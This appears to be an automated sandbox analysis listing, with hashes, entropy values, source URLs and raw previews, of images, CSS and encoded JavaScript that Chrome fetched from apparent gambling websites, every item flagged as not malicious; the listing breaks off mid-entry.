                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 232 x 310, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9556
                                                                                                                                                          Entropy (8bit):7.845579124655623
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:jNnBpZ6SbaXEfDwCgeXViePEk0Hg+los8bpLjKsH:Fp6SuXEf8C7Vie82+loDdj/
                                                                                                                                                          MD5:18A7FD3CC4D2B9138B65A61818127A27
                                                                                                                                                          SHA1:D881B6F457DB91EA96D8A870A241A1E378AB2A06
                                                                                                                                                          SHA-256:56433A4E7E8AB661C96E9496C380EDD6EDA7F1D46A588656238606494DE6264F
                                                                                                                                                          SHA-512:7734AE1D5E8F2EA5C33D0BDBAD381123614579B4BD9FEBB70B1292D5F6A182041F125A4FFCD268C769A8DB7D2C86743F89C3C0EE9023DF718862B45513F236F0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.......6.....k......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:7C2C473A50A211E790FDDAE19757E7A9" xmpMM:DocumentID="xmp.did:7C2C473B50A211E790FDDAE19757E7A9"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7C2C473850A211E790FDDAE19757E7A9" stRef:documentID="xmp.did:7C2C473950A211E790FDDAE19757E7A9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>......!.IDATx...|.E..{&!..@."....O...'...^..E9...........|+.."...D}..EPV.*.....3..A..DP..t...uUOuO.D....3.LOOOO
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):151324
                                                                                                                                                          Entropy (8bit):5.961896786964676
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:VD6KReWP4vtuGy4eSm0zapcJJUfyXx3O4/wLyrXk66RC0s:VD6KMKUuAFmwapcJJUfyXxeerXk6QC0s
                                                                                                                                                          MD5:CA7749BA7912EB65B729E869BB83ACD9
                                                                                                                                                          SHA1:4CE57A051731944EAD05072DCE1F47EAE7787170
                                                                                                                                                          SHA-256:DB3F625270BDB9B6EC85570C242CB9FE63D0ECBEBF003F5E043A5AFADD03BC96
                                                                                                                                                          SHA-512:05DB56552FFBF63C9D8D7061BFB13A7FD7A937BBC52BBA33C19DACBD47DB95A958B482FF47B696712F3915D49E7A4BFF4679E1508ED0ACB8A019E20D9413E8E4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/vendor.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgTgDYBdAGgG8AiAagCYakqAuAMwFc0YAXAS3UzcyIMmgCU1dkhAACJNwBOvHlQDcANygKZCgLxpMVACJIArAAUqYsr32GALAQCOALyuYAhAAYxqhZgUAOnMyKgBlRV40AHMqSihuNk4efgNuCQUQbnYFNBleQQALXiQydIBfcrFy0JoAYQBZAhYOLj4BIRFxSWk5SJUNLR07YzNLa1sDKhRuUyYxT1xrFF1sEkCogBMQAA8AeVYyKF0PDxQAMnPcAHo8da3dg8xcMgBaHwAeLz8A4JoggBiACpMFAAD5gjxTABy0IUbgWKDE1ioAEEFAooABPOIUB77VhJNqpQQZLI5PJQAD8KECUAgEAANliiiUjgpouwALYgNDcJBiCFeZgFbjFUpCLScnl8pB3apVGq0ACiAGZmkSUh1hKIJNxArsICgFPyTlMwgAOOiM9ytLUGMnZXIyADsHl0ezAACsQDxAttWFEQOYFCgICATSyKEqoLjollNe0HRRMk68i7KmI6Yrag1uDQWskk4Idd0qFJZPIlANNNo9FMTBYrDYRi7ogANLzNlZTPYuACSTmbxymLr2uHmZCQIwwhQAElYfkFzP9AgAlUIhlBckogXGBtBQRnMxMk9IUWsyEC6KCs0q8YKhnfSCG0rfPkDWNC6Kh2pNUXRdG4LFwxQVgZG4PxyWdMUSkCMVeUwNAqT/ElulTCk5EwERuEwZF4MKRDUIER1MLQRVmCEZDiIMdDoLyJBsLKPCswQgwaLwigxVDYAZHI6pKIVapagALQaBBC2JbUugkS960MRk9jQCTfH1Q1jVNDjOl1PFWACUkyHUFBeE2GQvEA3RPwwmDVCQYBeG4GBCiQiQYCgXpcGYay8g4ui0wgwI3OPJjxHKVQ3N6OgvPomRfLIBRSJgwKj0ZEL4uqcL3NkVVov8uKFBsRK8n1ILUq6eLCsqbzYqLEkioC+k
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2780
                                                                                                                                                          Entropy (8bit):4.679453948024632
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:wJSlS+StSYnlVSYe932WavjNFL8PMPY1dP6S//6vAZtdlkZzaNZINmZZDU3Zv3Mw:wJSlS+StSkVSZ32W4jNFL8PMPEdP6S/O
                                                                                                                                                          MD5:633098D68444FAE4FEEC36E757A6498C
                                                                                                                                                          SHA1:83244D45A17B6BA8FBF67C41B2CE4E2322DB8421
                                                                                                                                                          SHA-256:7FD1C34D205F2165EE1B3CC3C2FE54AF6F115C58BBD849907C3CF2BE6814B159
                                                                                                                                                          SHA-512:F1AEBD6F3446C67BC9E11F0E3C95549431C9DD009CB2AB8EC1C95EDDAFA46AE946134CA50B9B1973A4875048C8D78A3682386CDFF8335A689DAEF27DBC61B299
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/ftl/bwin1768/themes/style/bootstrap-dialog.min.css
                                                                                                                                                          Preview:.bootstrap-dialog .modal-header {. border-top-left-radius: 4px;. border-top-right-radius: 4px.}...bootstrap-dialog .bootstrap-dialog-title {. color: #fff;. text-align: center;. font-size: 18px.}...bootstrap-dialog .bootstrap-dialog-message {. font-size: 14px.}...bootstrap-dialog .bootstrap-dialog-button-icon {. margin-right: 3px.}...bootstrap-dialog .bootstrap-dialog-close-button {. font-size: 20px;. float: right;. filter: alpha(opacity=90);. -moz-opacity: .9;. -khtml-opacity: .9;. opacity: .9.}...bootstrap-dialog .bootstrap-dialog-close-button:hover {. cursor: pointer;. filter: alpha(opacity=100);. -moz-opacity: 1;. -khtml-opacity: 1;. opacity: 1.}...bootstrap-dialog.type-default .modal-header {. background-color: #fff.}...bootstrap-dialog.type-default .bootstrap-dialog-title {. color: #333.}...bootstrap-dialog.type-info .modal-header {. background-color: #00a0e6.}...bootstrap-dialog.type-primary .modal-header {. backgr
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 635
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):431
                                                                                                                                                          Entropy (8bit):7.4934780132929495
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:XXWJdFuB29sE7jgQaTQIHqlBerth2wEK6wuO2Iu/:XXWJdFsDEQlrHWB2QrUbo
                                                                                                                                                          MD5:EE1F28F59BC095C075D29DCF5A3EE1E9
                                                                                                                                                          SHA1:073584A9DAB2F999BB3BC2B45837232A7182DED5
                                                                                                                                                          SHA-256:B916E0A30F5B07409434924174F16716C008C91182E82CED7438EFE2C9E5C5BA
                                                                                                                                                          SHA-512:47EBF70058592267F62627EC1A09B133C854DDDFCC2B41D7CF2C5506D1AA769656BBCD47FA78D19E744EBC997A7C08E9230EAF1F8654C8EC42965F8C60924D3C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/zb-cloud/stat.do?pv=ajax&pa=host.info&domain=wns732.cc&terminal=1&r=8344766569
                                                                                                                                                          Preview:..........T..n.0...<..U...F.n...H..R.U......7.&f.AQ.6.m:.fF?....:.M..N....B....I.pr.,*...2(..6q..5.W6..B......*..6.bTU;...yj...L.g./...zgtSA.Pc..p6H..ha...w.p.F..M.>........N.U.../b[......O..)P....n.5NH.p.l..Y8..7...J.f..U...~[..9.G/zE...7.H......2.F/...*.<g1.[-y...n.o.........I.d.W..0lW.\.$7.L...f..%v..k>...).vX..8.n..Z!...U...j..u.".]E....P......>?+WUl...O.!.&.V..y.<'9...L.-N.#.....5.. ../...........bZ{...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15721
                                                                                                                                                          Entropy (8bit):7.951906564348781
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:dKczy4UH/wjIDwYeQYJsBxAHUED+jPNaB7PeeNsGiOhj:oWybH/wjIXJKCgp2N67aVOt
                                                                                                                                                          MD5:CF546C6FD6FFD1448867E707453F53F8
                                                                                                                                                          SHA1:C00AF79E1A3B5BA95D05DC83807403BF12E3BA17
                                                                                                                                                          SHA-256:D2B002C3665CAFB298339F3DADCAAC9595EDC7565F79BFB5602369300ED59426
                                                                                                                                                          SHA-512:298F6272660EF8D487EF7C1106DC0C95392D6F7DB891E4694C6024E8778DC95DD182B00A89AB7FF4E6C72D4AC0038D37AA4049D6C87DE0F5D7C5A7CB2BE8F4D1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/video/mg_h.jpg
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BF908D288D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BF908D278D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 94 x 106, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8521
                                                                                                                                                          Entropy (8bit):7.969752001872923
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:jjzADoJ7BM/SYBnVNkHoK0erzoUC6uAEmtHdEDRL3itf:jnCoJ9MaYtfk/rtCFpCHC+f
                                                                                                                                                          MD5:8490DFD5BC6C30AA0D8A2AF1F9B7500F
                                                                                                                                                          SHA1:14781D05C17616629083E281B49EE45066426D40
                                                                                                                                                          SHA-256:85181C2483DD31361E49637D31AB0E89339FC3C243A31CF06AA7C39E318F48EF
                                                                                                                                                          SHA-512:98D5DE93412C579714D5023EEE77AB9F9F227E3A371E7FC3A407F3BEC5C2DD3690756F57E2C5B68C0246D2E2CB4A1D750B7131AFE0B7F7416E803CB48122F540
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...^...j.....59.... .IDATx^..x.G.._fe...T.[.C.q....26..G.4X.4......g..=.....`..l.~.m....;.}....m.6.0.}c..U.*I...:T.+3.{...*.*+.XF.....U.....|...Q.|.....p.......|.....=......?..<p......8....<9....(..H.v.w...Gc$...H....@Q...c....oR.9..@S....1..8....GV.EW...../...8.).H6.O.Y.W...P.+..8..P....g.(.8*.<.........A...8.....PQ......(.j.b.8..".P..K..?l......$*..4...&P..6d....n&..4..!.....p....+.A`....Bn..i..#.t..@gf....@qj.j |..h.Q.....|/...<d..`.w.k.Xt..Y....E.^M&.@.%.#....$2#I..P....V..2Cn..:.<7..\....N..JfwkL.4...t?R............i>}..3...n[...d...4..<..J:...}rU....:.f..V....2+.I..?...D.?..^_.b.<...O*i.....Z.G0.....w....B..X.=as.......;G.....t....=}....d.%.4.""..*.l......8.. .d|G..4..D..'v.Ke.IV!^...n..<....F.>w..n...6.../.\.U..+gR..D..A...d2..W.Ol..H..\@...........0.....N...?...k....n..(F....y&.Xa....S...y./......d..uM(.1..c.....2./..?......P/...k.=7.c..{..3.j..FP.<.`.-.Q.S..q...P.!.....^..:.H39t=$(4..wo..+.=`.Oi...\.Pi....J+.x..P7....._
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 48 x 67, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7800
                                                                                                                                                          Entropy (8bit):7.970449245904087
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:+RVNjHK0a1SAiP3yGpvf+k87OS7ZB6JYUmkDdfN7Yf:+R21SAgyImk8ySdBGjsf
                                                                                                                                                          MD5:DE14D15581AC192D20078039F420C19F
                                                                                                                                                          SHA1:B4CAE3879F321B105CD149A6EC0C1CAF5D344CF2
                                                                                                                                                          SHA-256:7C0FAF1993C1A7B6C7493E4394E00F80513E96EA3928A56475FE167BBB2EABB0
                                                                                                                                                          SHA-512:DA4E015669037976D6EF9230EF1CDCF722F2D79CE28805F0406296EB85928D91A4E0BD6D3AB7DE74C5617BE370C79094A289CA934C4148B5E7038087E4592CE3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/parner/argentina_logo.png
                                                                                                                                                          Preview:.PNG........IHDR...0...C...........?IDAThC...xUU.....~N...$..!D.t...AE...k.:.3(*....U.:..c...{..J...H(...sr..{...'.UG....|.y..w.z........'G....-....l?.R...O...SZ.k..S......p...f.o^.....[2}rFf.e..z..9........i.......,3e..,.z..~....z.........$......5.....5...-.R.g.....O.......]n..PU.......n.......^_....Q.A.1..&.y.w.6}...A.f-Rp....#^g=3f.\1..i.p......Hj......&..*...T......;n..N.....'.r.7......h.+7.Y..........Q..'...i..^:..9.d.. +..z..{..<..{.6=.....=E.>e.......#.].h...B.^|...g.<p`..%'..i.G^P>+..[.m.;;.k....o.TT9.*........9.........UR......l../...,.{^l....c...+..@..'.....?.`.%W..{N......C..d.>..+.}..5..~n.5p.../>..6._.{..mW^..Euu........c..i..?.|........<...d...4....E.......?.U-L..x.H.5|...).5%.';...6)....n:.:.!......r9;*.....C&.....o.[3."..}.m...).VFF.O...?{~.@.!.'K.....@.....n.B..$.G.ZB.iiI..n....LM7c...U.$$..:...r.#Ag.j"....O..8]tv.......f....h.p.*I...>P+........J.P..%IIf..A1@2.vu..A3ul..i..hD..C..4.I.$......$..!.i>.)...&..5..a..I..7..Us.].*
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15676
                                                                                                                                                          Entropy (8bit):7.95677851421634
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:trkksoIK3AL/H1VPrpeCm4uR72goHW11m71bmrvF:trDI0eH1VFeCm4E7IW14YrvF
                                                                                                                                                          MD5:E9D6F1F9FE9BD1A84D160111A694055B
                                                                                                                                                          SHA1:CAEAA79A384502FB99A1ECDC935F484415C025F7
                                                                                                                                                          SHA-256:2D45AA957F5D5C9D8B607977301737CBEC92E1A5BC21EA5C52001E3DC71796E3
                                                                                                                                                          SHA-512:9E044E7AC8DA66289449E26DF7FE3DA44739B37CBBCE9103061750D1760131F9C2297A9DE6FE22869FE16557A283C2EC86676DC312C06A240D6C4AF371FDE973
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:6D4B3F368D5911E7A155C2C7373E56B1" xmpMM:InstanceID="xmp.iid:6D4B3F358D5911E7A155C2C7373E56B1" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3004
                                                                                                                                                          Entropy (8bit):7.884532026591409
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:ZBOoMFiIQcFstMeBLnkaFOgCqWkHF7LxqoJNmNhXZ5ceJ1MBUbjeFS1WEtg4:OokiId+tpNkaF3CZqF791XmNz5D6Fyh
                                                                                                                                                          MD5:F560593973969DBD9FB9B26301C2F48C
                                                                                                                                                          SHA1:8540E400278DC357B1E961DF9167DCD18D456863
                                                                                                                                                          SHA-256:92FC8F2D796ED7DA22041D67EF24FE718DDF32237735748096ECC2E5345FDF39
                                                                                                                                                          SHA-512:566B8F62EEA03D072ADD1F78850C2910184F3FCEBC52B411FDA1B45485EAD9807215D236D88C0E341D088AC3DAF663AFB7CC3B4145FD90748174B73989E86A75
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/fish_tp-6.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME........B......IDATH.}.i...Y...y..os......x...c.@S.j..n*..,....H.$...."..j..V ..$."PZ....YJ.$8.cO.z2^f...9s.s..=...b....p_......3.....#.R...x1..R....3....sg>.z.p....[..?.9.,."........*p.k.O.3.....!..JK?....~s*..f.K.....VY.x..+>.|.:.o.[..sOx^..B..... T0.......B.o|.!.R.0b.....B7..]kQj*:.........er!..o...G.pid..ln..g....;..n.Y.x........ ...{q._?O..DL.......m.?.^nH..p.d'.L.C.I..z... ..H...W.%j...^.|.OBo.../=w./_..:..e.....C....... .R.=T........|.u...p...P=F..D6.0b...k.pzm".E...3..D&..H....a....;...Y..s.|..}.._._|...p!.@.a.3a.|..r)..7_a..\..>..B.X.&v.C...F..y^.."[...IB.F.U...%..X"..?.j..(..m"..9..O.A.../.....M.....[|..V.....5...5.....!.k........@..Q`....z....j...E.j.}6K5.9W.......X..f...o......(5~..[.....P....e......".`@..G...)...r.|1..cL....^..jc.9..>K(sD.%T....5.>{1%C....2n.....p....d.A.s..=....E..Mq.%.U..}.l..;...1.....a...h.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 230 x 129, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):59287
                                                                                                                                                          Entropy (8bit):7.98182700009852
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:tTeWsIfexhsubphYPKrVwuB5rU453R9i/IAmSZQTqtamSnwQ+Kp:3NKs0pCPKrVwu753vcfZQX/p
                                                                                                                                                          MD5:C09459AB8D5588FEC8A886278644B9E3
                                                                                                                                                          SHA1:CA80BC95F42A6EBFE333689DFEE132F06C030AC3
                                                                                                                                                          SHA-256:C9350E92C41653FF5EFA30105991C4ECA3147624EECCB0FBBB92059AA6D5649F
                                                                                                                                                          SHA-512:1A3A13F106172413962BEA91E48C963A2AA8DA75AD4959ED7A6C4765719792163C2EC40AB24AB605A925CB03804E0212F2F402A9336B97E1F517140E1B46ABCA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/game/img_sport.png
                                                                                                                                                          Preview:.PNG........IHDR...............Y....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmp:CreateDate="2023-07-19T12:07:20+08:00" xmp:ModifyDate="2023-07-24T11:13:52+08:00" xmp:MetadataDate="2023-07-24T11:13:52+08:00" xmpMM:InstanceID="xmp.iid:21d5f2f5-1108-48a7-8f79-a443e70a19a4" xmpMM:DocumentID="xmp.did:148B2D4BF3A011E79ACBA17FF833D180" xmpMM:OriginalDocumentID="xmp.did:148B
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2153
                                                                                                                                                          Entropy (8bit):7.350943969357906
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:u1hiyWwylZ82lYSqMHi4OyV7zT3XyJ3VyAvGbDEztGpW7gsC+lUQIl4jUM1+S3hu:0uinNuiY5eJ3fWD97+SdlGwwFLDe
                                                                                                                                                          MD5:168AAAAE57F32099066336ACA1A5A4D1
                                                                                                                                                          SHA1:56D836A065E0FF03F655BDAAB9D7FC66217648B5
                                                                                                                                                          SHA-256:DC31AA1C5B25425C763EEBC5B2B6917DE930A61A21EB9065A943679DE092F5E7
                                                                                                                                                          SHA-512:0E531989024A91FA559C84A7911D0ED1F1C1B7C335938A238AD36D3362389AD587EB7902BA2A100D0B24E043A712A5ED328DCE5A72F599600A3E0B3FF817F741
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/nav/icon-s/game_bbin_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:E7858501F77411E78A94DA59F900EF65" xmpMM:InstanceID="xmp.iid:E7858500F77411E78A94DA59F900EF65" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:66D1DD4E49E111E79B7D9577B3604CC5" stRef:documentID="xmp.did:66D1DD4F49E111E79B7D9577B3604CC5"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (10584), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):10584
                                                                                                                                                          Entropy (8bit):5.806810913778816
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:V9lZKUj0LqM2XCUq3fFP6sqEocsbDhmzn41C4X/oT2dayu7p:V9XWLB2s3NvBocetmz4V/Y2dayE
                                                                                                                                                          MD5:2A870B7ED0368D1FE3E3315C6E7ACA60
                                                                                                                                                          SHA1:3FBAB2444F9614020AF05EE1B63DB3221A0E23D2
                                                                                                                                                          SHA-256:0F5866C2552567F42B10DD421EE5DC715B344554C30D4627D95263C5A9E0A60B
                                                                                                                                                          SHA-512:A0DE052CB20F0154A19C9A3E86BAAEFCFBB66143EDEB3ED001B1FA8476D5A4278EBC33191F0652418F13C5073774D2EC3ADBAE4764575E60F543EF6832941D99
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/t3685-index-js.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjATgDYBdAGgG8AiAdgCEAmfSgLgDMBXNGAFwEt1MIUt1JQAlFXZIQAAiTcATrx6UA3AHkwAKxA8AdABMQrXmhAAFBSgggF3AJ6YRlAPouQSALIoD7ADYglBQAblB+7CDMAIQADAC+YqKGTqSUABYgUEYKQRxcfAISCiDc7ApoMmgJSQYplAC2IGjsuZw8/GiYRSVlFfXVUMnOfigA5qYAyiWt+R1d5MWl5TK8A0OprCgo3LYz7YULPcsAXmu1w9s7CvYA4lCNSHsFnd1LFX5ndRBWvjzexU85q9ejIYJ9nGA/LA4AARbaAg6LEEGcGpUxIXhGBEvQ5vGSjVGUdGYkC0KBoMw5Uh5fY4pHLJCE+T2ALY+b0iouQl+XjBQLUtrPdlHCo3QlQMAodjcSUADzZwOWrEJECh3E2CnqCtxINlhLuD21HJkKEJ3DSxX5NKFioqCkJwRJKE85gALEaRTIAEoqqB2SkAGV48g9eIghPqKDAvACADkQMAkGkUMBQyCAKIRqMxq2CoE65a0M0gWXcAAq1jTywAgoTTEZZQBhdA7NDcKsVdiEsDcNAASRg6A7MjSWYMsfYWoFs0Rnr7Y/ojfUsbLuGH6kJo3uIBhUG4UGHnhVVkjO2Hjaz0YCcOAaGHZYSqlCCkqAF5yCNRihmORmQEf8AmLmswlAAMwxDEEDyqQGS8KMaTcCB1CQdB3DWCBuD0FBQQBKwiGUAAtK6uAoZQcRxMIvAQEgQbyMw2DkA4NggTyaBwEEyjoCBAA+OHBtwfY7PU9HEBRjH2MxlB8I0ZEUExkSUKx7GkJxaA8Xx8iCSAwkMTspaNgAEiBgAY8oABwaANy2gAVSoA5JqAKHKQQwFCxzHCBQQWsYIEIdw1HMAA9L5EEAKxEPYaR6IO9S+UE+4KKMJQgS4kLksprBQkmIEyDIxQGNxADErAFRBMSyYxJbcIZIGAP1+gD3s
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (2756), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2756
                                                                                                                                                          Entropy (8bit):5.896185491872585
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:V8dnAImgQA4/4U1HjCiiI8cGsrve2VhY3hmTlDRlm2NdyqbsCafXTcI1FqTrPUim:V8gFWU1H7iI8krSElDRlmgdXbmwI1FsO
                                                                                                                                                          MD5:FAB708A58E7441D050A75FD27FE1C8C0
